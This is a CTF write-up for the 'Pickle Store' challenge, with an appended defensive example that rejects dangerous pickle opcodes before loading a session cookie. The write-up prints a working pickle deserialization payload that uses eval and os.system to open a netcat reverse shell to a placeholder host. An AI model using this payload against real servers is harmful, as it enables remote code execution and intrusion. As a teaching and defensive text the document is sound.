[watevrCTF 2019] Pickle Store
Look at the cookie.
Base64-decode the string and deserialize it with pickle.loads():
import pickle
import base64
# The cookie value is base64 over a pickle stream; decoding it locally reveals the session structure.
c = pickle.loads(base64.b64decode("gAN9cQAoWAUAAABtb25leXEBTfQBWAcAAABoaXN0b3J5cQJdcQNYEAAAAGFudGlfdGFtcGVyX2htYWNxBFggAAAAYWExYmE0ZGU1NTA0OGNmMjBlMGE3YTYzYjdmOGViNjJxBXUu"))
print(c)
# {'money': 500, 'history': [], 'anti_tamper_hmac': 'aa1ba4de55048cf20e0a7a63b7f8eb62'}
This gives us the concrete session contents, so we guess that the backend reads the session cookie and pickle-deserializes it.
Pickle deserialization
EXP:
import base64
import pickle
class A(object):
    # __reduce__ tells pickle to rebuild this object by calling eval() on the given string,
    # so the call happens inside the server's pickle.loads().
    def __reduce__(self):
        return (eval, ("__import__('os').system('nc XXXXXXXX 2333 -e/bin/sh')",))
a = A()
print(base64.b64encode(pickle.dumps(a)))
Write the generated string into the cookie and refresh the page to get a reverse shell.
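For the defensive side of the same bug, here is an added example (not code from the challenge or the write-up) that shows how a server could refuse a cookie like the one above before executing it: it walks the pickle opcode stream with pickletools without running it, rejects any opcode that resolves a global or calls a callable, and loads the rest with an Unpickler whose find_class refuses every import. The benign cookie is the one from the write-up; the tampered sample is constructed here from a harmless ValueError, which pickles with the same GLOBAL/REDUCE pattern the exploit relies on. The real fix is to stop pickling session data at all (JSON plus a verified HMAC); this check only demonstrates why the payload works.

```python
import base64
import io
import pickle
import pickletools

# Cookie value from the write-up above: a plain dict with money, history, anti_tamper_hmac.
BENIGN_COOKIE = ("gAN9cQAoWAUAAABtb25leXEBTfQBWAcAAABoaXN0b3J5cQJdcQNYEAAAAGFudGlfdGFtcGVyX2htYWNx"
                 "BFggAAAAYWExYmE0ZGU1NTA0OGNmMjBlMGE3YTYzYjdmOGViNjJxBXUu")

# Opcodes that resolve a module.name or invoke a callable during load. A session
# holding only ints, strings, lists and dicts never needs any of them.
DANGEROUS_OPCODES = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ",
                     "NEWOBJ", "NEWOBJ_EX", "BUILD"}


def dangerous_opcodes(cookie_b64: str) -> list:
    """Disassemble the pickle (no execution) and list the offending opcode names."""
    raw = base64.b64decode(cookie_b64)
    return [op.name for op, _arg, _pos in pickletools.genops(raw)
            if op.name in DANGEROUS_OPCODES]


class NoGlobalsUnpickler(pickle.Unpickler):
    """Second line of defence: even if an opcode slips past, no global can be resolved,
    so a __reduce__ callable such as eval or os.system is never looked up."""

    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"global {module}.{name} is not allowed in a session")


def load_session_cookie(cookie_b64: str):
    """Return the session dict, or None when the cookie is rejected."""
    if dangerous_opcodes(cookie_b64):
        return None
    try:
        return NoGlobalsUnpickler(io.BytesIO(base64.b64decode(cookie_b64))).load()
    except pickle.UnpicklingError:
        return None


def constructed_callable_cookie() -> str:
    """Constructed sample: ValueError pickles as GLOBAL builtins.ValueError + REDUCE,
    the same 'call something on load' shape as the exploit, but harmless."""
    return base64.b64encode(pickle.dumps(ValueError("constructed"))).decode()
```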